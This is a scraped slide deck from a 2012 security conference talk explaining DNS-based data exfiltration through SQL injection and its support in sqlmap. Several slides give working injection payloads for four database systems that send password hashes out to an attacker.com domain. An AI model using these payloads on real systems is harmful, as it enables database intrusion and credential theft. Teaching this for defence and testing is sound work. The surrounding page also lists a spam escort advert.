Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseMiroslav Stampar
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureMiroslav Stampar
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsMiroslav Stampar
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 

More from Miroslav Stampar (8)

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identification
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic Denoise
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical Infrastructure
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the Bears
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 

Recently uploaded

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 

Recently uploaded (20)

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 

DNS exfiltration using sqlmap

  • 1. DNS exfiltration using sqlmap Miroslav Štampar (dev@sqlmap.org)
  • 2. What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) PHDays 2012, Moscow (Russia) May 31, 2012 2
  • 3. What is SQL injection? (2)  In plain speak, SQL injection is all about the unauthorized database access  “Hello World” vulnerable code example (PHP/MySQL):     $sql = "SELECT * FROM events WHERE id = " .  $_GET["id"];     $result = mysql_query($sql);  Sample attack:   http://www.target.com/vuln.php?id=1 AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x3a, (SELECT password FROM mysql.user LIMIT  0,1),0x3a,FLOOR(RAND(0)*2))x FROM  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) PHDays 2012, Moscow (Russia) May 31, 2012 3
  • 4. What is SQL injection? (3)  Harder example (PHP/MySQL):     error_reporting(0);     set_magic_quotes_runtime(true);     $sql=”INSERT INTO Users (FirstName, LastName,  Age) VALUES  ('$_REQUEST[firstname]','$_REQUEST[lastname]', $_REQUEST[age])”;     @mysql_query($sql); PHDays 2012, Moscow (Russia) May 31, 2012 4
  • 5. Technique classification  Inband (web page as channel) Union  Full  Partial Error-based  Inference (bit-by-bit) Boolean-based blind Time-based (and stacked queries)  Out-of-band (alternative transport channels) HTTP DNS PHDays 2012, Moscow (Russia) May 31, 2012 5
  • 6. Inband techniques  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request PHDays 2012, Moscow (Russia) May 31, 2012 6
  • 7. Inference techniques  Boolean-based blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked queries – ;INSERT INTO users VALUES  (10, 'test', 'testpass'), usually time-based data retrieval PHDays 2012, Moscow (Russia) May 31, 2012 7
  • 8. Out-of-band (OOB) techniques  HTTP – AND LENGTH(UTL_HTTP.REQUEST  ('http://www.attacker.com/log.php?q='|| (SELECT password FROM SYS.USER$ WHERE  name='SYS')))>0, fast, 1 (sub)query result per request, capturing/logging HTTP requests at the other side  DNS – AND LENGTH(UTL_INADDR.  GET_HOST_ADDRESS((SELECT password FROM  SYS.USER$ WHERE  name='SYS')||'.attacker.com'))>0, relatively fast, 1 part of (sub)query result per request, capturing/logging DNS requests at the other side PHDays 2012, Moscow (Russia) May 31, 2012 8
  • 9. DNS protocol  relatively simple protocol  resolving domain names  UDP datagrams (except zone transfers which use TCP)  forwarding requests for arbitrary domain names  ...even if access to public networks is not allowed :) PHDays 2012, Moscow (Russia) May 31, 2012 9
  • 10. DNS protocol (2)  Name resolving methods: Client lookup – checking local client's cache (same request already occurred) Iterative – checking DNS server's cache and configured zone records Recursive – if other methods fail, query is forwarded to others, sending back retrieved results to client PHDays 2012, Moscow (Russia) May 31, 2012 10
  • 11. DNS protocol (3) PHDays 2012, Moscow (Russia) May 31, 2012 11
  • 12. DNS exfiltration “Exfiltration [eks-fil-treyt, eks-fil-treyt] 1. verb (used without object) to escape furtively from an area under enemy control 2. verb (used with object) to smuggle out of an area under enemy control” (source: dictionary.reference.com) PHDays 2012, Moscow (Russia) May 31, 2012 12
  • 13. DNS exfiltration (2)  When fast inband techniques fail data is (usually) extracted in a bit-by-bit manner  Most attackers will avoid exploitation of targets with time-based technique  Non-query SQL statements like INSERT/UPDATE/DELETE are especially problematic  Alternative methods are more than welcome (e.g. uploading of web shell scripts)  OOB techniques are rarely used (till now) PHDays 2012, Moscow (Russia) May 31, 2012 13
  • 14. DNS exfiltration (3)  In some cases it's possible to incorporate SQL (sub)query results into DNS resolution requests  Any function that accepts network address could be used  Microsoft SQL Server, Oracle, MySQL and PostgreSQL  Potentially dozens of resulting characters can be transferred per single request PHDays 2012, Moscow (Russia) May 31, 2012 14
  • 15. DNS exfiltration (4)  Microsoft SQL Server:     DECLARE @host varchar(1024);     SELECT @host=(SELECT TOP 1  master.dbo.fn_varbintohexstr(password_hash) FROM  sys.sql_logins WHERE name='sa')+'.attacker.com';     EXEC('master..xp_dirtree "'+@host+'c$"'); PHDays 2012, Moscow (Russia) May 31, 2012 15
  • 16. DNS exfiltration (5)  Oracle:     SELECT DBMS_LDAP.INIT((SELECT password FROM  SYS.USER$ WHERE name='SYS')||'.attacker.com',80)  FROM DUAL;  MySQL:     SELECT LOAD_FILE(CONCAT('',(SELECT  password FROM mysql.user WHERE user='root' LIMIT  1),'.attacker.comfoobar')); PHDays 2012, Moscow (Russia) May 31, 2012 16
  • 17. DNS exfiltration (6)  PostgreSQL:     DROP TABLE IF EXISTS table_output;     CREATE TABLE table_output(content text);     CREATE OR REPLACE FUNCTION temp_function()     RETURNS VOID AS $$     DECLARE exec_cmd TEXT;     DECLARE query_result TEXT;     BEGIN         SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE  usename='postgres');         exec_cmd := E'COPY table_output(content) FROM E''|| query_result||E'.attacker.comfoobar.txt'';         EXECUTE exec_cmd;     END;     $$ LANGUAGE plpgsql SECURITY DEFINER;     SELECT temp_function(); PHDays 2012, Moscow (Russia) May 31, 2012 17
  • 18. DNS exfiltration (7) PHDays 2012, Moscow (Russia) May 31, 2012 18
  • 19. DNS exfiltration (8) PHDays 2012, Moscow (Russia) May 31, 2012 19
  • 20. Integration into sqlmap  New command line option: --dns-domain Turning on DNS exfiltration support Domain where should provoked DNS requests point to (e.g. --dns-domain=attacker.com)  DNS exfiltration vectors sent through previously detected SQLi (e.g. time-based)  Inband techniques have automatically higher priority  Hence, usable only in inference-only cases PHDays 2012, Moscow (Russia) May 31, 2012 20
  • 21. Integration into sqlmap (2)  Domain name server entry (e.g. ns1.attacker.com) has to point to IP address of machine running sqlmap sqlmap being run as a fake DNS server Serving and logging all incoming DNS requests Dummy responses (e.g. 127.0.0.1) sent just to unblock web server instance PHDays 2012, Moscow (Russia) May 31, 2012 21
  • 22. Integration into sqlmap (3)  Each pushed result enclosed with unique prefix and suffix (e.g. Xzk. … .iUR.attacker.com) Cancelling caching mechanisms Easy to match SQLi requests with DNS results  Complying with RFC 1034 (Domain Names – Concepts and Facilities) Hex encoding results to preserve non-word chars Splitting long items to parts of length 63 (maximum length of one label name) Otherwise DNS resolution requests are immediately dropped as invalid (no resolution) PHDays 2012, Moscow (Russia) May 31, 2012 22
  • 23. Experimental setup 1)Attacker (172.16.138.1) ➢ physical machine – Ubuntu 12.04 LTS 64-bit OS ➢ sqlmap v1.0-dev (r5100) 2)Web Server (172.16.138.129) ➢ virtual machine – Windows XP 32-bit SP1 OS ➢ XAMPP 1.7.3 with SQLi vulnerable MySQL/PHP web application 3)DNS Server (172.16.138.130) ➢ virtual machine – CentOS 6.2 64-bit OS ➢ BIND9 DNS daemon PHDays 2012, Moscow (Russia) May 31, 2012 23
  • 24. Results (--dump -T COLLATIONS -D information_schema) Method # of requests Time (sec) Boolean-based blind 29,212 214.04 Time-based (1 sec) 32,716 17,720.51 Error-based 777 9.02 Union (full/partial) 3/136 0.70/2.50 DNS exfiltration 1,409 35.31 PHDays 2012, Moscow (Russia) May 31, 2012 24
  • 25. Video presentation PHDays 2012, Moscow (Russia) May 31, 2012 25
  • 26. Questions? PHDays 2012, Moscow (Russia) May 31, 2012 26